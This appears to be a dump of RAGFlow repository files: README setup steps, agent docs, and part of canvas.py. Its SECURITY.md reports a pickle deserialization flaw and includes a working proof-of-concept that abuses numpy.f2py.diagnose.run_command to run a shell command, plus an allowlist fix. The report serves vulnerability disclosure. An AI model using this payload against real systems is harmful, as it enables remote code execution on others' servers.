+ - 2025-01-26 优化知识图谱的提取和应用,提供了多种配置选择。
60
+ - 2024-12-18 升级了 Deepdoc 的文档布局分析模型。
61
+ - 2024-12-04 支持知识库的 Pagerank 分数。
62
+ - 2024-11-22 完善了 Agent 中的变量定义和使用。
63
+ - 2024-11-01 对解析后的 chunk 加入关键词抽取和相关问题生成以提高召回的准确度。
64
+ - 2024-08-22 支持用 RAG 技术实现从自然语言到 SQL 语句的转换。
65
+
66
+ ## 🎉 关注项目
67
+
68
+ ⭐️ 点击右上角的 Star 关注 RAGFlow,可以获取最新发布的实时通知 !🌟
69
+
70
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
71
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
72
+ </div>
73
+
74
+ ## 🌟 主要功能
75
+
76
+ ### 🍭 **"Quality in, quality out"**
77
+
78
+ - 基于[深度文档理解](./deepdoc/README.md),能够从各类复杂格式的非结构化数据中提取真知灼见。
79
+ - 真正在无限上下文(token)的场景下快速完成大海捞针测试。
80
+
81
+ ### 🍱 **基于模板的文本切片**
82
+
83
+ - 不仅仅是智能,更重要的是可控可解释。
84
+ - 多种文本模板可供选择
85
+
86
+ ### 🌱 **有理有据、最大程度降低幻觉(hallucination)**
87
+
88
+ - 文本切片过程可视化,支持手动调整。
89
+ - 有理有据:答案提供关键引用的快照并支持追根溯源。
90
+
91
+ ### 🍔 **兼容各类异构数据源**
92
+
93
+ - 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
94
+
95
+ ### 🛀 **全程无忧、自动化的 RAG 工作流**
96
+
97
+ - 全面优化的 RAG 工作流可以支持从个人应用乃至超大型企业的各类生态系统。
98
+ - 大语言模型 LLM 以及向量模型均支持配置。
99
+ - 基于多路召回、融合重排序。
100
+ - 提供易用的 API,可以轻松集成到各类企业系统。
101
+
102
+ ## 🔎 系统架构
103
+
104
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
105
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
106
+ </div>
107
+
108
+ ## 🎬 快速开始
109
+
110
+ ### 📝 前提条件
111
+
112
+ - CPU >= 4 核
113
+ - RAM >= 16 GB
114
+ - Disk >= 50 GB
115
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
116
+ > 如果你并没有在本机安装 Docker(Windows、Mac,或者 Linux), 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
117
+
118
+ ### 🚀 启动服务器
119
+
120
+ 1. 确保 `vm.max_map_count` 不小于 262144:
121
+
122
+ > 如需确认 `vm.max_map_count` 的大小:
123
+ >
124
+ > ```bash
125
+ > $ sysctl vm.max_map_count
126
+ > ```
127
+ >
128
+ > 如果 `vm.max_map_count` 的值小于 262144,可以进行重置:
129
+ >
130
+ > ```bash
131
+ > # 这里我们设为 262144:
132
+ > $ sudo sysctl -w vm.max_map_count=262144
133
+ > ```
134
+ >
135
+ > 你的改动会在下次系统重启时被重置。如果希望做永久改动,还需要在 **/etc/sysctl.conf** 文件里把 `vm.max_map_count` 的值再相应更新一遍:
136
+ >
137
+ > ```bash
138
+ > vm.max_map_count=262144
139
+ > ```
140
+
141
+ 2. 克隆仓库:
142
+
143
+ ```bash
144
+ $ git clone https://github.com/infiniflow/ragflow.git
145
+ ```
146
+
147
+ 3. 进入 **docker** 文件夹,利用提前编译好的 Docker 镜像启动服务器:
148
+
149
+ > 运行以下命令会自动下载 RAGFlow slim Docker 镜像 `v0.16.0-slim`。请参考下表查看不同 Docker 发行版的描述。如需下载不同于 `v0.16.0-slim` 的 Docker 镜像,请在运行 `docker compose` 启动服务之前先更新 **docker/.env** 文件内的 `RAGFLOW_IMAGE` 变量。比如,你可以通过设置 `RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0` 来下载 RAGFlow 镜像的 `v0.16.0` 完整发行版。
150
+
151
+ ```bash
152
+ $ cd ragflow
153
+ $ docker compose -f docker/docker-compose.yml up -d
154
+ ```
155
+
156
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
157
+ | ----------------- | --------------- | --------------------- | ------------------------ |
158
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
159
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
160
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
161
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
162
+
163
+ > [!TIP]
164
+ > 如果你遇到 Docker 镜像拉不下来的问题,可以在 **docker/.env** 文件内根据变量 `RAGFLOW_IMAGE` 的注释提示选择华为云或者阿里云的相应镜像。
165
+ >
166
+ > - 华为云镜像名:`swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow`
167
+ > - 阿里云镜像名:`registry.cn-hangzhou.aliyuncs.com/infiniflow/ragflow`
168
+
169
+ 4. 服务器启动成功后再次确认服务器状态:
170
+
171
+ ```bash
172
+ $ docker logs -f ragflow-server
173
+ ```
174
+
175
+ _出现以下界面提示说明服务器启动成功:_
176
+
177
+ ```bash
178
+ ____ ___ ______ ______ __
179
+ / __ \ / | / ____// ____// /____ _ __
180
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
181
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
182
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
183
+
184
+ * Running on all addresses (0.0.0.0)
185
+ * Running on http://127.0.0.1:9380
186
+ * Running on http://x.x.x.x:9380
187
+ INFO:werkzeug:Press CTRL+C to quit
188
+ ```
189
+
190
+ > 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network anormal` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
191
+
192
+ 5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
193
+ > 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
194
+ 6. 在 [service_conf.yaml.template](./docker/service_conf.yaml.template) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
195
+
196
+ > 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
197
+
198
+ _好戏开始,接着奏乐接着舞!_
199
+
200
+ ## 🔧 系统配置
201
+
202
+ 系统配置涉及以下三份文件:
203
+
204
+ - [.env](./docker/.env):存放一些基本的系统环境变量,比如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
205
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template):配置各类后台服务。
206
+ - [docker-compose.yml](./docker/docker-compose.yml): 系统依赖该文件完成启动。
207
+
208
+ 请务必确保 [.env](./docker/.env) 文件中的变量设置与 [service_conf.yaml.template](./docker/service_conf.yaml.template) 文件中的配置保持一致!
209
+
210
+ 如果不能访问镜像站点 hub.docker.com 或者模型站点 huggingface.co,请按照 [.env](./docker/.env) 注释修改 `RAGFLOW_IMAGE` 和 `HF_ENDPOINT`。
211
+
212
+ > [./docker/README](./docker/README.md) 解释了 [service_conf.yaml.template](./docker/service_conf.yaml.template) 用到的环境变量设置和服务配置。
213
+
214
+ 如需更新默认的 HTTP 服务端口(80), 可以在 [docker-compose.yml](./docker/docker-compose.yml) 文件中将配置 `80:80` 改为 `<YOUR_SERVING_PORT>:80`。
215
+
216
+ > 所有系统配置都需要通过系统重启生效:
217
+ >
218
+ > ```bash
219
+ > $ docker compose -f docker/docker-compose.yml up -d
220
+ > ```
221
+
222
+ ### 把文档引擎从 Elasticsearch 切换成为 Infinity
223
+
224
+ RAGFlow 默认使用 Elasticsearch 存储文本和向量数据. 如果要切换为 [Infinity](https://github.com/infiniflow/infinity/), 可以按照下面步骤进行:
225
+
226
+ 1. 停止所有容器运行:
227
+
228
+ ```bash
229
+ $ docker compose -f docker/docker-compose.yml down -v
230
+ ```
231
+
232
+ 2. 设置 **docker/.env** 目录中的 `DOC_ENGINE` 为 `infinity`.
233
+
234
+ 3. 启动容器:
235
+
236
+ ```bash
237
+ $ docker compose -f docker/docker-compose.yml up -d
238
+ ```
239
+
240
+ > [!WARNING]
241
+ > Infinity 目前官方并未正式支持在 Linux/arm64 架构下的机器上运行.
242
+
243
+ ## 🔧 源码编译 Docker 镜像(不含 embedding 模型)
244
+
245
+ 本 Docker 镜像大小约 2 GB 左右并且依赖外部的大模型和 embedding 服务。
246
+
247
+ ```bash
248
+ git clone https://github.com/infiniflow/ragflow.git
249
+ cd ragflow/
250
+ docker build --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
251
+ ```
252
+
253
+ ## 🔧 源码编译 Docker 镜像(包含 embedding 模型)
254
+
255
+ 本 Docker 大小约 9 GB 左右。由于已包含 embedding 模型,所以只需依赖外部的大模型服务即可。
256
+
257
+ ```bash
258
+ git clone https://github.com/infiniflow/ragflow.git
259
+ cd ragflow/
260
+ docker build --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
261
+ ```
262
+
263
+ ## 🔨 以源代码启动服务
264
+
265
+ 1. 安装 uv。如已经安装,可跳过本步骤:
266
+
267
+ ```bash
268
+ pipx install uv
269
+ export UV_INDEX=https://pypi.tuna.tsinghua.edu.cn/simple
270
+ ```
271
+
272
+ 2. 下载源代码并安装 Python 依赖:
273
+
274
+ ```bash
275
+ git clone https://github.com/infiniflow/ragflow.git
276
+ cd ragflow/
277
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
278
+ ```
279
+
280
+ 3. 通过 Docker Compose 启动依赖的服务(MinIO, Elasticsearch, Redis, and MySQL):
281
+
282
+ ```bash
283
+ docker compose -f docker/docker-compose-base.yml up -d
284
+ ```
285
+
286
+ 在 `/etc/hosts` 中添加以下代码,将 **conf/service_conf.yaml** 文件中的所有 host 地址都解析为 `127.0.0.1`:
287
+
288
+ ```
289
+ 127.0.0.1 es01 infinity mysql minio redis
290
+ ```
291
+
292
+ 4. 如果无法访问 HuggingFace,可以把环境变量 `HF_ENDPOINT` 设成相应的镜像站点:
293
+
294
+ ```bash
295
+ export HF_ENDPOINT=https://hf-mirror.com
296
+ ```
297
+
298
+ 5. 启动后端服务:
299
+
300
+ ```bash
301
+ source .venv/bin/activate
302
+ export PYTHONPATH=$(pwd)
303
+ bash docker/launch_backend_service.sh
304
+ ```
305
+
306
+ 6. 安装前端依赖:
307
+ ```bash
308
+ cd web
309
+ npm install
310
+ ```
311
+ 7. 启动前端服务:
312
+
313
+ ```bash
314
+ npm run dev
315
+ ```
316
+
317
+ _以下界面说明系统已经成功启动:_
318
+
319
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
320
+
321
+ ## 📚 技术文档
322
+
323
+ - [Quickstart](https://ragflow.io/docs/dev/)
324
+ - [User guide](https://ragflow.io/docs/dev/category/guides)
325
+ - [References](https://ragflow.io/docs/dev/category/references)
326
+ - [FAQ](https://ragflow.io/docs/dev/faq)
327
+
328
+ ## 📜 路线图
329
+
330
+ 详见 [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214) 。
331
+
332
+ ## 🏄 开源社区
333
+
334
+ - [Discord](https://discord.gg/4XxujFgUN7)
335
+ - [Twitter](https://twitter.com/infiniflowai)
336
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
337
+
338
+ ## 🙌 贡献指南
339
+
340
+ RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的 [贡献者指南](./CONTRIBUTING.md) 。
341
+
342
+ ## 🤝 商务合作
343
+
344
+ - [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
345
+
346
+ ## 👥 加入社区
347
+
348
+ 扫二维码添加 RAGFlow 小助手,进 RAGFlow 交流群。
349
+
350
+ <p align="center">
351
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
352
+ </p>
ragflow-main/SECURITY.md ADDED
@@ -0,0 +1,74 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Security Policy
2
+
3
+ ## Supported Versions
4
+
5
+ The versions of this project listed below are currently
6
+ supported with security updates.
7
+
8
+ | Version | Supported |
9
+ | ------- | ------------------ |
10
+ | <=0.7.0 | :white_check_mark: |
11
+
12
+ ## Reporting a Vulnerability
13
+
14
+ ### Branch name
15
+
16
+ main
17
+
18
+ ### Actual behavior
19
+
20
+ The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable and can lead to code execution.
21
+ The main reason is that the numpy module provides numpy.f2py.diagnose.run_command, a function that directly executes commands, while the restricted_loads function allows users to import functions from the numpy module.
22
+
23
+
24
+ ### Steps to reproduce
25
+
26
+
27
+ **ragflow_patch.py**
28
+
29
+ ```py
30
+ import builtins
31
+ import io
32
+ import pickle
33
+
34
+ safe_module = {
35
+ 'numpy',
36
+ 'rag_flow'
37
+ }
38
+
39
+
40
+ class RestrictedUnpickler(pickle.Unpickler):
41
+ def find_class(self, module, name):
42
+ import importlib
43
+ if module.split('.')[0] in safe_module:
44
+ _module = importlib.import_module(module)
45
+ return getattr(_module, name)
46
+ # Forbid everything else.
47
+ raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
48
+ (module, name))
49
+
50
+
51
+ def restricted_loads(src):
52
+ """Helper function analogous to pickle.loads()."""
53
+ return RestrictedUnpickler(io.BytesIO(src)).load()
54
+ ```
55
+ Then, **PoC.py**
56
+ ```py
57
+ import pickle
58
+ from ragflow_patch import restricted_loads
59
+ class Exploit:
60
+ def __reduce__(self):
61
+ import numpy.f2py.diagnose
62
+ return numpy.f2py.diagnose.run_command, ('whoami', )
63
+
64
+ Payload=pickle.dumps(Exploit())
65
+ restricted_loads(Payload)
66
+ ```
67
+ **Result**
68
+ ![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)
69
+
70
+
71
+ ### Additional information
72
+
73
+ #### How to prevent?
74
+ Strictly filter both the module and the name before resolving them with the getattr function, e.g. by checking them against an explicit allowlist.
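+
+ A minimal sketch of such an allowlist-based unpickler follows; the allowed `(module, name)` pairs are only illustrative and should be narrowed to the exact globals the application actually needs to unpickle:
+
+ ```py
+ import io
+ import pickle
+
+ # Only these exact (module, name) pairs may be unpickled; everything else is rejected.
+ SAFE_GLOBALS = {
+     ("numpy", "dtype"),
+     ("numpy.core.multiarray", "_reconstruct"),
+ }
+
+
+ class StrictUnpickler(pickle.Unpickler):
+     def find_class(self, module, name):
+         if (module, name) in SAFE_GLOBALS:
+             import importlib
+             return getattr(importlib.import_module(module), name)
+         # Forbid everything else, including callables such as numpy.f2py.diagnose.run_command.
+         raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
+
+
+ def strict_loads(src):
+     """Helper function analogous to pickle.loads(), but restricted to an exact allowlist."""
+     return StrictUnpickler(io.BytesIO(src)).load()
+ ```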
ragflow-main/agent/README.md ADDED
@@ -0,0 +1,45 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ English | [简体中文](./README_zh.md)
2
+
3
+ # *Graph*
4
+
5
+
6
+ ## Introduction
7
+
8
+ *Graph* is a mathematical concept composed of nodes and edges.
9
+ It is used to compose a complex workflow or agent.
10
+ This graph goes beyond a DAG: cycles can be used to describe an agent or workflow.
11
+ Under this folder, we provide a test tool, ./test/client.py, which can test DSLs such as the JSON files in the folder ./test/dsl_examples.
12
+ Please run this client from the same folder in which you start RAGFlow. If RAGFlow is run by Docker, please go into the container before running the client.
13
+ Otherwise, correct configuration in service_conf.yaml is essential.
14
+
15
+ ```bash
16
+ PYTHONPATH=path/to/ragflow python graph/test/client.py -h
17
+ usage: client.py [-h] -s DSL -t TENANT_ID -m
18
+
19
+ options:
20
+ -h, --help show this help message and exit
21
+ -s DSL, --dsl DSL input dsl
22
+ -t TENANT_ID, --tenant_id TENANT_ID
23
+ Tenant ID
24
+ -m, --stream Stream output
25
+ ```
26
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
27
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/79179c5e-d4d6-464a-b6c4-5721cb329899" width="1000"/>
28
+ </div>
29
+
30
+
31
+ ## How to obtain a TENANT_ID from the command line?
32
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
33
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
34
+ </div>
35
+ 💡 We plan to display it here in the near future.
36
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
37
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
38
+ </div>
39
+
40
+
41
+ ## How to set 'kb_ids' for component 'Retrieval' in DSL?
42
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
43
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
44
+ </div>
45
+
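+
+ For reference, below is a hedged sketch (written as a Python dict) of where `kb_ids` sits inside a 'Retrieval' component entry of the DSL: it is a list of knowledge base IDs, obtained as shown in the screenshot above. The other parameter names are only illustrative and may differ between DSL versions.
+
+ ```python
+ # Hedged DSL fragment: the point here is only the location of "kb_ids".
+ retrieval_component = {
+     "retrieval_0": {
+         "obj": {
+             "component_name": "Retrieval",
+             "params": {
+                 "kb_ids": ["<YOUR_KB_ID>"],   # knowledge base ID(s)
+                 "top_n": 6,                   # illustrative
+                 "similarity_threshold": 0.2,  # illustrative
+             },
+         },
+         "downstream": ["generate_0"],
+         "upstream": ["answer_0"],
+     }
+ }
+ ```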
ragflow-main/agent/README_zh.md ADDED
@@ -0,0 +1,46 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [English](./README.md) | 简体中文
2
+
3
+ # *Graph*
4
+
5
+
6
+ ## 简介
7
+
8
+ "Graph"是一个由节点和边组成的数学概念。
9
+ 它被用来构建复杂的工作流或代理。
10
+ 这个图超越了有向无环图(DAG),我们可以使用循环来描述我们的代理或工作流。
11
+ 在这个文件夹下,我们提出了一个测试工具 ./test/client.py,
12
+ 它可以测试像文件夹./test/dsl_examples下一样的DSL文件。
13
+ 请在启动 RAGFlow 的同一文件夹中使用此客户端。如果它是通过 Docker 运行的,请在运行客户端之前进入容器。
14
+ 否则,正确配置 service_conf.yaml 文件是必不可少的。
15
+
16
+ ```bash
17
+ PYTHONPATH=path/to/ragflow python graph/test/client.py -h
18
+ usage: client.py [-h] -s DSL -t TENANT_ID -m
19
+
20
+ options:
21
+ -h, --help show this help message and exit
22
+ -s DSL, --dsl DSL input dsl
23
+ -t TENANT_ID, --tenant_id TENANT_ID
24
+ Tenant ID
25
+ -m, --stream Stream output
26
+ ```
27
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
28
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/05924730-c427-495b-8ee4-90b8b2250681" width="1000"/>
29
+ </div>
30
+
31
+
32
+ ## 命令行中的TENANT_ID如何获得?
33
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
34
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
35
+ </div>
36
+ 💡 后面会展示在这里:
37
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
38
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
39
+ </div>
40
+
41
+
42
+ ## DSL里面的Retrieval组件的kb_ids怎么填?
43
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
44
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
45
+ </div>
46
+
ragflow-main/agent/__init__.py ADDED
@@ -0,0 +1,18 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+
17
+ from beartype.claw import beartype_this_package
18
+ beartype_this_package()
ragflow-main/agent/canvas.py ADDED
@@ -0,0 +1,366 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ import json
18
+ from abc import ABC
19
+ from copy import deepcopy
20
+ from functools import partial
21
+
22
+ import pandas as pd
23
+
24
+ from agent.component import component_class
25
+ from agent.component.base import ComponentBase
26
+
27
+
28
+ class Canvas(ABC):
29
+ """
30
+ dsl = {
31
+ "components": {
32
+ "begin": {
33
+ "obj":{
34
+ "component_name": "Begin",
35
+ "params": {},
36
+ },
37
+ "downstream": ["answer_0"],
38
+ "upstream": [],
39
+ },
40
+ "answer_0": {
41
+ "obj": {
42
+ "component_name": "Answer",
43
+ "params": {}
44
+ },
45
+ "downstream": ["retrieval_0"],
46
+ "upstream": ["begin", "generate_0"],
47
+ },
48
+ "retrieval_0": {
49
+ "obj": {
50
+ "component_name": "Retrieval",
51
+ "params": {}
52
+ },
53
+ "downstream": ["generate_0"],
54
+ "upstream": ["answer_0"],
55
+ },
56
+ "generate_0": {
57
+ "obj": {
58
+ "component_name": "Generate",
59
+ "params": {}
60
+ },
61
+ "downstream": ["answer_0"],
62
+ "upstream": ["retrieval_0"],
63
+ }
64
+ },
65
+ "history": [],
66
+ "messages": [],
67
+ "reference": [],
68
+ "path": [["begin"]],
69
+ "answer": []
70
+ }
71
+ """
72
+
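+ # A hedged usage sketch (the names and values below are placeholders, not a contract):
+ #   canvas = Canvas(dsl_json_str, tenant_id="<tenant_id>")
+ #   canvas.add_user_input("Hello")
+ #   for ans in canvas.run(stream=False):
+ #       print(ans)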
73
+ def __init__(self, dsl: str, tenant_id=None):
74
+ self.path = []
75
+ self.history = []
76
+ self.messages = []
77
+ self.answer = []
78
+ self.components = {}
79
+ self.dsl = json.loads(dsl) if dsl else {
80
+ "components": {
81
+ "begin": {
82
+ "obj": {
83
+ "component_name": "Begin",
84
+ "params": {
85
+ "prologue": "Hi there!"
86
+ }
87
+ },
88
+ "downstream": [],
89
+ "upstream": [],
90
+ "parent_id": ""
91
+ }
92
+ },
93
+ "history": [],
94
+ "messages": [],
95
+ "reference": [],
96
+ "path": [],
97
+ "answer": []
98
+ }
99
+ self._tenant_id = tenant_id
100
+ self._embed_id = ""
101
+ self.load()
102
+
103
+ def load(self):
104
+ self.components = self.dsl["components"]
105
+ cpn_nms = set([])
106
+ for k, cpn in self.components.items():
107
+ cpn_nms.add(cpn["obj"]["component_name"])
108
+
109
+ assert "Begin" in cpn_nms, "There has to be a 'Begin' component."
111
+ assert "Answer" in cpn_nms, "There has to be an 'Answer' component."
111
+
112
+ for k, cpn in self.components.items():
113
+ cpn_nms.add(cpn["obj"]["component_name"])
114
+ param = component_class(cpn["obj"]["component_name"] + "Param")()
115
+ param.update(cpn["obj"]["params"])
116
+ param.check()
117
+ cpn["obj"] = component_class(cpn["obj"]["component_name"])(self, k, param)
118
+ if cpn["obj"].component_name == "Categorize":
119
+ for _, desc in param.category_description.items():
120
+ if desc["to"] not in cpn["downstream"]:
121
+ cpn["downstream"].append(desc["to"])
122
+
123
+ self.path = self.dsl["path"]
124
+ self.history = self.dsl["history"]
125
+ self.messages = self.dsl["messages"]
126
+ self.answer = self.dsl["answer"]
127
+ self.reference = self.dsl["reference"]
128
+ self._embed_id = self.dsl.get("embed_id", "")
129
+
130
+ def __str__(self):
131
+ self.dsl["path"] = self.path
132
+ self.dsl["history"] = self.history
133
+ self.dsl["messages"] = self.messages
134
+ self.dsl["answer"] = self.answer
135
+ self.dsl["reference"] = self.reference
136
+ self.dsl["embed_id"] = self._embed_id
137
+ dsl = {
138
+ "components": {}
139
+ }
140
+ for k in self.dsl.keys():
141
+ if k in ["components"]:
142
+ continue
143
+ dsl[k] = deepcopy(self.dsl[k])
144
+
145
+ for k, cpn in self.components.items():
146
+ if k not in dsl["components"]:
147
+ dsl["components"][k] = {}
148
+ for c in cpn.keys():
149
+ if c == "obj":
150
+ dsl["components"][k][c] = json.loads(str(cpn["obj"]))
151
+ continue
152
+ dsl["components"][k][c] = deepcopy(cpn[c])
153
+ return json.dumps(dsl, ensure_ascii=False)
154
+
155
+ def reset(self):
156
+ self.path = []
157
+ self.history = []
158
+ self.messages = []
159
+ self.answer = []
160
+ self.reference = []
161
+ for k, cpn in self.components.items():
162
+ self.components[k]["obj"].reset()
163
+ self._embed_id = ""
164
+
165
+ def get_compnent_name(self, cid):
166
+ for n in self.dsl["graph"]["nodes"]:
167
+ if cid == n["id"]:
168
+ return n["data"]["name"]
169
+ return ""
170
+
171
+ def run(self, **kwargs):
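+ # Drive the graph: if an 'Answer' component is pending, run it first; otherwise start
+ # from 'begin' and walk downstream components, yielding running-status messages and answers.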
172
+ if self.answer:
173
+ cpn_id = self.answer[0]
174
+ self.answer.pop(0)
175
+ try:
176
+ ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
177
+ except Exception as e:
178
+ ans = ComponentBase.be_output(str(e))
179
+ self.path[-1].append(cpn_id)
180
+ if kwargs.get("stream"):
181
+ for an in ans():
182
+ yield an
183
+ else:
184
+ yield ans
185
+ return
186
+
187
+ if not self.path:
188
+ self.components["begin"]["obj"].run(self.history, **kwargs)
189
+ self.path.append(["begin"])
190
+
191
+ self.path.append([])
192
+
193
+ ran = -1
194
+ waiting = []
195
+ without_dependent_checking = []
196
+
197
+ def prepare2run(cpns):
198
+ nonlocal ran, ans
199
+ for c in cpns:
200
+ if self.path[-1] and c == self.path[-1][-1]:
201
+ continue
202
+ cpn = self.components[c]["obj"]
203
+ if cpn.component_name == "Answer":
204
+ self.answer.append(c)
205
+ else:
206
+ logging.debug(f"Canvas.prepare2run: {c}")
207
+ if c not in without_dependent_checking:
208
+ cpids = cpn.get_dependent_components()
209
+ if any([cc not in self.path[-1] for cc in cpids]):
210
+ if c not in waiting:
211
+ waiting.append(c)
212
+ continue
213
+ yield "*'{}'* is running...🕞".format(self.get_compnent_name(c))
214
+
215
+ if cpn.component_name.lower() == "iteration":
216
+ st_cpn = cpn.get_start()
217
+ assert st_cpn, "Start component not found for Iteration."
218
+ if not st_cpn["obj"].end():
219
+ cpn = st_cpn["obj"]
220
+ c = cpn._id
221
+
222
+ try:
223
+ ans = cpn.run(self.history, **kwargs)
224
+ except Exception as e:
225
